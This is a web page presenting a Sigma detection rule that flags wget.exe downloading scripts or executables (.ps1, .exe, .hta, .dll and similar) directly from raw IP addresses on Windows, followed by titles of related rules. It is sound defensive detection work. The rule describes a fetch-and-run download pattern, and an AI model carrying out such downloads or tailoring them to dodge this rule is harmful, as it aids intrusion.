Suspicious File Download From IP Via Wget.EXE
Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
Sigma rule (View on GitHub)
1title: Suspicious File Download From IP Via Wget.EXE
2id: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35
3status: test
4description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
5references:
6 - https://www.gnu.org/software/wget/manual/wget.html
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2023-07-27
9tags:
10 - attack.execution
11logsource:
12 category: process_creation
13 product: windows
14detection:
15 selection_img:
16 - Image|endswith: '\wget.exe'
17 - OriginalFileName: 'wget.exe'
18 selection_ip:
19 CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
20 selection_http:
21 CommandLine|contains: 'http'
22 selection_flag:
23 - CommandLine|re: '\s-O\s'
24 - CommandLine|contains: '--output-document'
25 selection_ext:
26 CommandLine|endswith:
27 # Note you can transform this into a "contains" to increase coverage but you would need to take care of some FP.
28 - '.ps1'
29 - ".ps1'"
30 - '.ps1"'
31 - '.dat'
32 - ".dat'"
33 - '.dat"'
34 - '.msi'
35 - ".msi'"
36 - '.msi"'
37 - '.bat'
38 - ".bat'"
39 - '.bat"'
40 - '.exe'
41 - ".exe'"
42 - '.exe"'
43 - '.vbs'
44 - ".vbs'"
45 - '.vbs"'
46 - '.vbe'
47 - ".vbe'"
48 - '.vbe"'
49 - '.hta'
50 - ".hta'"
51 - '.hta"'
52 - '.dll'
53 - ".dll'"
54 - '.dll"'
55 - '.psm1'
56 - ".psm1'"
57 - '.psm1"'
58 condition: all of selection_*
59falsepositives:
60 - Unknown
61level: high
References
Related rules
- AADInternals PowerShell Cmdlets Execution - ProccessCreation
- AADInternals PowerShell Cmdlets Execution - PsScript
- AMSI Bypass Pattern Assembly GetType
- APT29 2018 Phishing Campaign CommandLine Indicators
- AWS EC2 Startup Shell Script Change